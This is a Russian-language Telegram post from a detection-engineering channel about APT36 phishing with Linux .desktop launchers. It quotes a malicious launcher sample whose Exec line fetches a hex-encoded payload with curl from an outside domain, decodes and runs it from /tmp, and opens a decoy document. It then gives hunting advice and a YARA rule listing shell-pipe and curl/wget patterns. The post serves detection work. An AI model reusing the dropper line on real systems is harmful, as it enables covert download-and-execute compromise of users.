TGViewer
Detection is easy Detection is easy @detectioneasy · 1.28K subscribers
Post #326 1.08K
Всем привет 💻✌️

Тема с ярлыками остаётся актуальной и для некоторых дистрибутивов Linux. Эту технику использует группировка APT36

.desktop — это launcher-файл, описанный в Desktop Entry Specification. Он используется desktop-environments для отображения приложений в меню и содержит параметр Exec, определяющий команду запуска.


Пример файла из отчёта:


[Desktop Entry]
Name=Meeting_Ltr_ID15430ps.pdf
Exec=bash -c 'tmp_file="/tmp/Meeting_Ltr_ID15430ps.pdf-$(date +%s)"; curl -s "https://securestore.cv/ghg/Mt_dated_29.txt" | xxd -r -p > "$tmp_file" && chmod +x "$tmp_file" && "$tmp_file" & firefox --new-window "https://drive.google.com/file/d/123"'
Terminal=false
Type=Application
Icon=application-pdf
Categories=Utility;
X-GNOME-Autostart-enabled=true
X-AppImage-Integrate=false


Злоумышленники используют файлы .desktop для получения доступа к хосту в фишинговых кампаниях. Далее цепочка действий несильно отличается от атак на Windows: загрузка вредоносного файла, его запуск и отображение пользователю decoy-файла

🔭 Обнаружение:
🔤 отслеживаем создание или модификацию .desktop файлов в пользовательских каталогах
🔤 хантим использование бинарей из gtfobins (bash, sh, python, curl, wget) в Exec


rule Linux_Desktop_Suspicious_GTFOBins
{
meta:
description = "Detect suspicious .desktop launcher executing shells or GTFOBins"
author = "@detectioneasy"
date = "2026-03-15"
reference = "https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/"

strings:
$desktop = "[Desktop Entry]" ascii nocase
$exec = "Exec=" ascii nocase

$sh = "sh -c" ascii nocase

$pipe_sh = "| sh" ascii nocase
$pipe_bash = "| bash" ascii nocase
$pipe_zsh = "| zsh" ascii nocase
$pipe_dash = "| dash" ascii nocase

$curl = "curl " ascii nocase
$wget = "wget " ascii nocase

$tmp = "/tmp/" ascii nocase
$cache = ".cache/" ascii nocase

condition:
$desktop and $exec and
2 of (
$sh,
$pipe_sh,$pipe_bash,$pipe_zsh,$pipe_dash,
$curl,$wget,$tmp,$cache
)
}


#detection@detectioneasy
#ttp@detectioneasy
CYFIRMA APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files - CYFIRMA Executive Summary CYFIRMA has identified an ongoing cyber-espionage campaign orchestrated by APT36 (Transparent Tribe), a Pakistan-based threat actor with a...
  • 🔥 10
  • ❤ 4
  • 👍 4
More from @detectioneasy
  1. Jul 29, 2026Всем привет 💻✌️ При проведении compromise assessment на Windows-машине в WORKGROUP сразу…
  2. Jul 16, 2026Всем привет 💻✌️ Коллеги из Инфотекс сообщают о возможной компрометации пользователей, пут…
  3. May 15, 2026Всем привет 💻✌️ Коллеги из PT ESC разобрали кампанию CapFix, нацеленную на российские орг…
  4. May 8, 2026В Windows 11 версии 24H2 и Windows Server 2025 добавлены новая политика и события аудита N…
  5. Apr 7, 2026Всем привет 💻✌️ Автор статьи показал интересный способ доставки вредоносного ПО в обход п…
  6. Mar 12, 2026Всем привет 💻✌️ Группа APT-36 собирает необычные .lnk файлы размером более 2 MB, которые…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →